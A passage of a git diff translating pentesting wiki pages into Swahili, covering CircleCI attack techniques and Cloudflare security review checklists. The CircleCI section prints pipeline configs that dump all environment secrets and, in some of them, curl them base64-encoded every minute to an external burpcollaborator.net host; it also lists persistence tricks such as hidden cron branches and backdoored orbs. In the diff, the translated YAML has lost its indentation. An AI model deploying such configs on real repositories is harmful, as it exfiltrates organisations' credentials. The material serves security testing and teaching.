-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
+Hizi ni **siri** ambazo zitakuwa **zinapatikana** tu na **mradi** (kwa **tawi lolote**).\
+Unaweza kuziona **zimeelezwa katika** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
.png>)
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
+> Kazi ya "**Kuagiza Vigezo**" inaruhusu **kuagiza vigezo kutoka miradi mingine** hadi hii.
-#### Context Secrets
+#### Siri za Muktadha
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
+Hizi ni siri ambazo ni **za shirika lote**. Kwa **kawaida kila repo** itakuwa na uwezo wa **kupata siri yoyote** iliyohifadhiwa hapa:
.png>)
> [!TIP]
-> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
+> Hata hivyo, kumbuka kwamba kundi tofauti (badala ya Wanachama Wote) linaweza **kuchaguliwa ili kutoa ufaccessi wa siri kwa watu maalum**.\
+> Hii kwa sasa ni moja ya njia bora za **kuongeza usalama wa siri**, ili kuto ruhusu kila mtu kuzipata bali watu wachache tu.
-### Attacks
+### Mashambulizi
-#### Search Clear Text Secrets
+#### Tafuta Siri za Maandishi Safi
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
+Ikiwa una **ufaccessi kwa VCS** (kama github) angalia faili `.circleci/config.yml` ya **kila repo kwenye kila tawi** na **tafuta** siri za **maandishi safi** zinazoweza kuwa zimehifadhiwa humo.
-#### Secret Env Vars & Context enumeration
+#### Siri za Env Vars & Uainishaji wa Muktadha
-Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_.
+Ukikagua msimbo unaweza kupata **majina yote ya siri** yanayotumika katika kila faili `.circleci/config.yml`. Unaweza pia kupata **majina ya muktadha** kutoka kwa hizo faili au kuangalia kwenye console ya wavuti: _https://app.circleci.com/settings/organization/github/\/contexts_.
-#### Exfiltrate Project secrets
+#### Fanya Uhamishaji wa Siri za Mradi
> [!WARNING]
-> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
+> Ili **kuhamasisha ZOTE** siri za mradi na muktadha **UNAHITAJI** tu kuwa na **UFACCESSI WA KUANDIKA** kwa **repo 1 tu** katika shirika lote la github (_na akaunti yako inapaswa kuwa na ufaccessi kwa muktadha lakini kwa kawaida kila mtu anaweza kupata kila muktadha_).
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-
-All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
+> Kazi ya "**Kuagiza Vigezo**" inaruhusu **kuagiza vigezo kutoka miradi mingine** hadi hii. Hivyo, mshambuliaji anaweza **kuagiza vigezo vyote vya mradi kutoka kwa repos zote** na kisha **kuhamasisha zote pamoja**.
+Siri zote za mradi kila wakati zimewekwa katika env ya kazi, hivyo tu kuita env na kuificha kwa base64 itahamisha siri katika **console ya logi ya wavuti ya workflows**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env
+exfil-env-workflow:
+jobs:
+- exfil-env
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+Ikiwa **huna ufikiaji wa console ya wavuti** lakini una **ufikiaji wa repo** na unajua kuwa CircleCI inatumika, unaweza tu **kuunda workflow** ambayo inachochewa kila dakika na ambayo **inasafirisha siri kwa anwani ya nje**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env
```
-
#### Exfiltrate Context Secrets
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
+Unahitaji **kueleza jina la muktadha** (hii pia itatoa siri za mradi):
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+jobs:
+- exfil-env:
+context: Test-Context
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+Ikiwa **huna ufikiaji wa web console** lakini una **ufikiaji wa repo** na unajua kuwa CircleCI inatumika, unaweza tu **kubadilisha workflow** ambayo **inasababishwa kila dakika** na ambayo **inasafirisha siri kwa anwani ya nje**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env:
+context: Test-Context
```
-
> [!WARNING]
-> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
+> Kuunda tu `.circleci/config.yml` mpya katika repo **siyo ya kutosha kuanzisha ujenzi wa circleci**. Unahitaji **kuifanya kuwa mradi katika console ya circleci**.
-#### Escape to Cloud
+#### Kutoroka kwa Wingu
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
-Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
+**CircleCI** inakupa chaguo la kuendesha **ujenzi wako katika mashine zao au katika zako mwenyewe**.\
+Kwa kawaida, mashine zao ziko katika GCP, na awali huwezi kupata chochote muhimu. Hata hivyo, ikiwa mwathirika anatekeleza kazi katika **mashine zao wenyewe (labda, katika mazingira ya wingu)**, unaweza kupata **nukta ya metadata ya wingu yenye habari za kuvutia**.
+Kumbuka kwamba katika mifano ya awali kila kitu kilizinduliwa ndani ya kontena la docker, lakini unaweza pia **kuomba kuzindua mashine ya VM** (ambayo inaweza kuwa na ruhusa tofauti za wingu):
```yaml
jobs:
- exfil-env:
- #docker:
- # - image: cimg/base:stable
- machine:
- image: ubuntu-2004:current
+exfil-env:
+#docker:
+# - image: cimg/base:stable
+machine:
+image: ubuntu-2004:current
```
-
-Or even a docker container with access to a remote docker service:
-
+Au hata kontena la docker lenye ufikiaji wa huduma ya docker ya mbali:
```yaml
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - setup_remote_docker:
- version: 19.03.13
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- setup_remote_docker:
+version: 19.03.13
```
-
#### Persistence
-- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- - _https://app.circleci.com/settings/user/tokens_
-- It's possible to **create projects tokens** to access the project with the permissions given to the token.
- - _https://app.circleci.com/settings/project/github/\/\/api_
-- It's possible to **add SSH keys** to the projects.
- - _https://app.circleci.com/settings/project/github/\/\/ssh_
-- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
-- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
-- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
+- Inawezekana **kuunda** **tokens za mtumiaji katika CircleCI** ili kufikia API endpoints kwa ufikiaji wa watumiaji.
+- _https://app.circleci.com/settings/user/tokens_
+- Inawezekana **kuunda tokens za miradi** ili kufikia mradi kwa ruhusa zilizotolewa kwa token.
+- _https://app.circleci.com/settings/project/github/\/\/api_
+- Inawezekana **kuongeza funguo za SSH** kwenye miradi.
+- _https://app.circleci.com/settings/project/github/\/\/ssh_
+- Inawezekana **kuunda kazi ya cron katika tawi lililofichwa** katika mradi usiotarajiwa ambao unatoa **leak** ya **context env** vars kila siku.
+- Au hata kuunda katika tawi / kubadilisha kazi inayojulikana ambayo itatoa **leak** ya muktadha wote na **siri za miradi** kila siku.
+- Ikiwa wewe ni mmiliki wa github unaweza **kuruhusu orbs zisizothibitishwa** na kuziunda katika kazi kama **backdoor**
+- Unaweza kupata **udhaifu wa kuingiza amri** katika kazi fulani na **kuingiza amri** kupitia **siri** kwa kubadilisha thamani yake
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md
index 77d2c2c50..5cf035f7d 100644
--- a/src/pentesting-ci-cd/cloudflare-security/README.md
+++ b/src/pentesting-ci-cd/cloudflare-security/README.md
@@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
-In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika akaunti ya Cloudflare kuna **mipangilio na huduma za jumla** ambazo zinaweza kuanzishwa. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
## Websites
-Review each with:
+Kagua kila moja na:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
-- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
+- [ ] Katika **`Transfer Domains`** hakikisha kuwa haiwezekani kuhamasisha domain yoyote.
-Review each with:
+Kagua kila moja na:
{{#ref}}
cloudflare-domains.md
@@ -26,39 +26,39 @@ cloudflare-domains.md
## Analytics
-_I couldn't find anything to check for a config security review._
+_Sikuweza kupata chochote cha kukagua kwa ajili ya ukaguzi wa usalama wa mipangilio._
## Pages
-On each Cloudflare's page:
+Katika kila ukurasa wa Cloudflare:
-- [ ] Check for **sensitive information** in the **`Build log`**.
-- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
-- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
-- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
-- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
-- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
-- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
+- [ ] Kagua kwa **taarifa nyeti** katika **`Build log`**.
+- [ ] Kagua kwa **taarifa nyeti** katika **Github repository** iliyotengwa kwa ajili ya kurasa.
+- [ ] Kagua kwa uwezekano wa kuathiriwa kwa github repo kupitia **workflow command injection** au kuathiriwa kwa `pull_request_target`. Maelezo zaidi katika [**Github Security page**](../github-security/).
+- [ ] Kagua kwa **kazi zenye udhaifu** katika saraka ya `/fuctions` (ikiwa ipo), kagua **redirects** katika faili ya `_redirects` (ikiwa ipo) na **vichwa vilivyopangwa vibaya** katika faili ya `_headers` (ikiwa ipo).
+- [ ] Kagua kwa **udhaifu** katika **ukurasa wa wavuti** kupitia **blackbox** au **whitebox** ikiwa unaweza **kufikia msimbo**
+- [ ] Katika maelezo ya kila ukurasa `//pages/view/blocklist/settings/functions`. Kagua kwa **taarifa nyeti** katika **`Environment variables`**.
+- [ ] Katika ukurasa wa maelezo kagua pia **amri ya kujenga** na **saraka ya mzizi** kwa ajili ya **uwezekano wa kuingilia** ili kuathiri ukurasa.
## **Workers**
-On each Cloudflare's worker check:
+Katika kila mfanyakazi wa Cloudflare kagua:
-- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
-- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
-- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
- - Check for SSRFs returning the indicated page that you can control
- - Check XSSs executing JS inside a svg image
- - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
+- [ ] Vichocheo: Nini kinachofanya mfanyakazi kuanzishwa? Je, **mtumiaji anaweza kutuma data** ambayo itatumika na mfanyakazi?
+- [ ] Katika **`Settings`**, kagua kwa **`Variables`** zinazokuwa na **taarifa nyeti**
+- [ ] Kagua **msimbo wa mfanyakazi** na tafuta kwa **udhaifu** (hasa katika maeneo ambapo mtumiaji anaweza kudhibiti ingizo)
+- Kagua kwa SSRFs zinazorejesha ukurasa ulioonyeshwa ambao unaweza kudhibiti
+- Kagua XSSs zinazotekeleza JS ndani ya picha ya svg
+- Inawezekana kwamba mfanyakazi anashirikiana na huduma nyingine za ndani. Kwa mfano, mfanyakazi anaweza kuingiliana na R2 bucket inayohifadhi taarifa ndani yake iliyopatikana kutoka kwa ingizo. Katika kesi hiyo, itahitajika kukagua ni uwezo gani mfanyakazi ana juu ya R2 bucket na jinsi gani inaweza kutumika vibaya kutokana na ingizo la mtumiaji.
> [!WARNING]
-> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
+> Kumbuka kwamba kwa kawaida **Mfanyakazi anapewa URL** kama `..workers.dev`. Mtumiaji anaweza kuipanga kuwa **subdomain** lakini unaweza kila wakati kuipata kwa hiyo **URL ya asili** ikiwa unajua.
## R2
-On each R2 bucket check:
+Katika kila R2 bucket kagua:
-- [ ] Configure **CORS Policy**.
+- [ ] Panga **CORS Policy**.
## Stream
@@ -70,8 +70,8 @@ TODO
## Security Center
-- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
-- [ ] Just **check this information** for security misconfigurations and interesting info
+- [ ] Ikiwezekana,endesha **`Security Insights`** **scan** na **`Infrastructure`** **scan**, kwani zitatoa **maelezo** ya kuvutia kuhusu **usalama**.
+- [ ] Kagua tu **taarifa hii** kwa ajili ya mipangilio mibaya ya usalama na taarifa za kuvutia
## Turnstile
@@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
-> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static ā they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
+> Tofauti na [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) kimsingi ni za kudumu ā hazisaidii **operesheni za kubadilisha nyuzi** au matumizi ya kawaida. Hata hivyo, unaweza kupanga vigezo vya URL redirect vinavyoathiri tabia yao ya ulinganifu wa URL na tabia yao ya wakati wa kutekeleza.
-- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
-- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
+- [ ] Kagua kwamba **expressions** na **requirements** za redirects **zina maana**.
+- [ ] Kagua pia kwa **mipangilio ya siri iliyofichwa** ambayo ina taarifa za kuvutia.
## Notifications
-- [ ] Check the **notifications.** These notifications are recommended for security:
- - `Usage Based Billing`
- - `HTTP DDoS Attack Alert`
- - `Layer 3/4 DDoS Attack Alert`
- - `Advanced HTTP DDoS Attack Alert`
- - `Advanced Layer 3/4 DDoS Attack Alert`
- - `Flow-based Monitoring: Volumetric Attack`
- - `Route Leak Detection Alert`
- - `Access mTLS Certificate Expiration Alert`
- - `SSL for SaaS Custom Hostnames Alert`
- - `Universal SSL Alert`
- - `Script Monitor New Code Change Detection Alert`
- - `Script Monitor New Domain Alert`
- - `Script Monitor New Malicious Domain Alert`
- - `Script Monitor New Malicious Script Alert`
- - `Script Monitor New Malicious URL Alert`
- - `Script Monitor New Scripts Alert`
- - `Script Monitor New Script Exceeds Max URL Length Alert`
- - `Advanced Security Events Alert`
- - `Security Events Alert`
-- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
- - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
+- [ ] Kagua **notifications.** Taarifa hizi zinapendekezwa kwa usalama:
+- `Usage Based Billing`
+- `HTTP DDoS Attack Alert`
+- `Layer 3/4 DDoS Attack Alert`
+- `Advanced HTTP DDoS Attack Alert`
+- `Advanced Layer 3/4 DDoS Attack Alert`
+- `Flow-based Monitoring: Volumetric Attack`
+- `Route Leak Detection Alert`
+- `Access mTLS Certificate Expiration Alert`
+- `SSL for SaaS Custom Hostnames Alert`
+- `Universal SSL Alert`
+- `Script Monitor New Code Change Detection Alert`
+- `Script Monitor New Domain Alert`
+- `Script Monitor New Malicious Domain Alert`
+- `Script Monitor New Malicious Script Alert`
+- `Script Monitor New Malicious URL Alert`
+- `Script Monitor New Scripts Alert`
+- `Script Monitor New Script Exceeds Max URL Length Alert`
+- `Advanced Security Events Alert`
+- `Security Events Alert`
+- [ ] Kagua zote **destinations**, kwani kunaweza kuwa na **taarifa nyeti** (basic http auth) katika urls za webhook. Hakikisha pia urls za webhook zinatumia **HTTPS**
+- [ ] Kama ukaguzi wa ziada, unaweza kujaribu **kujifanya kuwa notification ya cloudflare** kwa upande wa tatu, labda unaweza kwa namna fulani **kuingiza kitu hatari**
## Manage Account
-- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
-- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
-- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- - Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
-- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
+- [ ] Inawezekana kuona **nambari 4 za mwisho za kadi ya mkopo**, **muda wa kumalizika** na **anwani ya bili** katika **`Billing` -> `Payment info`**.
+- [ ] Inawezekana kuona **aina ya mpango** inayotumika katika akaunti katika **`Billing` -> `Subscriptions`**.
+- [ ] Katika **`Members`** inawezekana kuona wanachama wote wa akaunti na **nafasi** zao. Kumbuka kwamba ikiwa aina ya mpango si Enterprise, kuna nafasi 2 tu: Msimamizi na Msimamizi Mkuu. Lakini ikiwa **mpango unaotumika ni Enterprise**, [**nafasi zaidi**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) zinaweza kutumika kufuata kanuni ya chini ya kibali.
+- Kwa hivyo, kila wakati inapowezekana ni **pendekezo** kutumia **mpango wa Enterprise**.
+- [ ] Katika Wanachama inawezekana kukagua ni **wanachama** gani wana **2FA imewezeshwa**. **Kila** mtumiaji anapaswa kuwa nayo imewezeshwa.
> [!NOTE]
-> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
+> Kumbuka kwamba kwa bahati nzuri nafasi **`Administrator`** haina ruhusa za kusimamia uanachama (**haiwezi kuongeza ruhusa au kuwaleta** wanachama wapya)
## DDoS Investigation
-[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
+[Angalia sehemu hii](cloudflare-domains.md#cloudflare-ddos-protection).
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
index 02989e685..f69351697 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -2,29 +2,29 @@
{{#include ../../banners/hacktricks-training.md}}
-In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika kila TLD iliyowekwa kwenye Cloudflare kuna **mipangilio na huduma za jumla** ambazo zinaweza kuwekwa. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
### Overview
-- [ ] Get a feeling of **how much** are the services of the account **used**
-- [ ] Find also the **zone ID** and the **account ID**
+- [ ] Pata hisia ya **ni kiasi gani** huduma za akaunti **zinatumika**
+- [ ] Pata pia **zone ID** na **account ID**
### Analytics
-- [ ] In **`Security`** check if there is any **Rate limiting**
+- [ ] Katika **`Security`** angalia kama kuna **Rate limiting**
### DNS
-- [ ] Check **interesting** (sensitive?) data in DNS **records**
-- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
-- [ ] Check for web pages that **aren't** **proxied**
-- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
-- [ ] Check that **DNSSEC** is **enabled**
-- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
-- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
+- [ ] Angalia **data za kuvutia** (nyeti?) katika **records** za DNS
+- [ ] Angalia **subdomains** ambazo zinaweza kuwa na **habari nyeti** kulingana na **jina** (kama admin173865324.domin.com)
+- [ ] Angalia kurasa za wavuti ambazo **hazijapangwa** **proxied**
+- [ ] Angalia kwa **kurasa za wavuti zilizopangwa** ambazo zinaweza **kupatikana moja kwa moja** kwa CNAME au anwani ya IP
+- [ ] Hakikisha kwamba **DNSSEC** ime **wezeshwa**
+- [ ] Hakikisha kwamba **CNAME Flattening** inatumika katika **CNAME zote**
+- Hii inaweza kuwa na manufaa ili **kuficha udhaifu wa kuchukua subdomain** na kuboresha nyakati za upakiaji
+- [ ] Hakikisha kwamba majina ya **hayana udhaifu wa spoofing** [**hayana udhaifu wa spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
### **Email**
@@ -38,44 +38,44 @@ TODO
#### **Overview**
-- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
-- [ ] The **SSL/TLS Recommender** should be enabled
+- [ ] **SSL/TLS encryption** inapaswa kuwa **Full** au **Full (Strict)**. Mengineyo yatatuma **trafiki ya maandiko wazi** kwa wakati fulani.
+- [ ] **SSL/TLS Recommender** inapaswa kuwezeshwa
#### Edge Certificates
-- [ ] **Always Use HTTPS** should be **enabled**
-- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
-- [ ] **Minimum TLS Version should be 1.2**
-- [ ] **TLS 1.3 should be enabled**
-- [ ] **Automatic HTTPS Rewrites** should be **enabled**
-- [ ] **Certificate Transparency Monitoring** should be **enabled**
+- [ ] **Always Use HTTPS** inapaswa kuwa **imewezeshwa**
+- [ ] **HTTP Strict Transport Security (HSTS)** inapaswa kuwa **imewezeshwa**
+- [ ] **Minimum TLS Version inapaswa kuwa 1.2**
+- [ ] **TLS 1.3 inapaswa kuwa imewezeshwa**
+- [ ] **Automatic HTTPS Rewrites** inapaswa kuwa **imewezeshwa**
+- [ ] **Certificate Transparency Monitoring** inapaswa kuwa **imewezeshwa**
### **Security**
-- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
-- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
-- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
-- [ ] In the **`Settings`** section:
- - [ ] Check that the **`Security Level`** is **medium** or greater
- - [ ] Check that the **`Challenge Passage`** is 1 hour at max
- - [ ] Check that the **`Browser Integrity Check`** is **enabled**
- - [ ] Check that the **`Privacy Pass Support`** is **enabled**
+- [ ] Katika sehemu ya **`WAF`** ni muhimu kuangalia kwamba **Firewall** na **kanuni za rate limiting zinatumika** kuzuia matumizi mabaya.
+- Kitendo cha **`Bypass`** kita **zima vipengele vya usalama vya Cloudflare** kwa ombi. Hakipaswi kutumika.
+- [ ] Katika sehemu ya **`Page Shield`** inapendekezwa kuangalia kwamba ime **wezeshwa** ikiwa kuna ukurasa wowote unatumika
+- [ ] Katika sehemu ya **`API Shield`** inapendekezwa kuangalia kwamba ime **wezeshwa** ikiwa kuna API yoyote iliyofichuliwa kwenye Cloudflare
+- [ ] Katika sehemu ya **`DDoS`** inapendekezwa kuwezesha **DDoS protections**
+- [ ] Katika sehemu ya **`Settings`**:
+- [ ] Hakikisha kwamba **`Security Level`** ni **kati** au zaidi
+- [ ] Hakikisha kwamba **`Challenge Passage`** ni saa 1 kwa max
+- [ ] Hakikisha kwamba **`Browser Integrity Check`** ime **wezeshwa**
+- [ ] Hakikisha kwamba **`Privacy Pass Support`** ime **wezeshwa**
#### **CloudFlare DDoS Protection**
-- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
-- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
- - If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
- - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- - Check if **Managed rules** could also help to prevent vulnerability exploitations.
- - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
-- In DDoS you could **override some rules to make them more restrictive**.
-- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
-- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
-- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
+- Ikiwa unaweza, wezesha **Bot Fight Mode** au **Super Bot Fight Mode**. Ikiwa unalinda API fulani inayopatikana kwa njia ya programu (kutoka ukurasa wa mbele wa JS kwa mfano). Huenda usiweze kuwezesha hii bila kuvunja ufikiaji huo.
+- Katika **WAF**: Unaweza kuunda **mipaka ya kiwango kwa njia ya URL** au kwa **bots zilizothibitishwa** (kanuni za rate limiting), au **kuzuia ufikiaji** kulingana na IP, Cookie, referrer...). Hivyo unaweza kuzuia maombi ambayo hayajatoka kwenye ukurasa wa wavuti au yana cookie.
+- Ikiwa shambulio linatoka kwa **bot iliyothibitishwa**, angalau **ongeza kiwango cha mipaka** kwa bots.
+- Ikiwa shambulio linahusiana na **njia maalum**, kama njia ya kuzuia, ongeza **mipaka ya kiwango** katika njia hii.
+- Unaweza pia **kuongeza kwenye orodha ya nyeupe** anwani za IP, anuwai za IP, nchi au ASNs kutoka **Zana** katika WAF.
+- Angalia ikiwa **Managed rules** zinaweza pia kusaidia kuzuia matumizi mabaya ya udhaifu.
+- Katika sehemu ya **Zana** unaweza **kuzuia au kutoa changamoto kwa IP maalum** na **vifaa vya mtumiaji.**
+- Katika DDoS unaweza **kubadilisha baadhi ya kanuni ili kuzifanya kuwa za kukatisha tamaa zaidi**.
+- **Settings**: Weka **Security Level** kuwa **Juu** na kuwa **Chini ya Shambulio** ikiwa uko chini ya shambulio na kwamba **Browser Integrity Check imewezeshwa**.
+- Katika Cloudflare Domains -> Analytics -> Security -> Angalia ikiwa **rate limit** imewezeshwa
+- Katika Cloudflare Domains -> Security -> Events -> Angalia kwa **matukio mabaya yaliyogunduliwa**
### Access
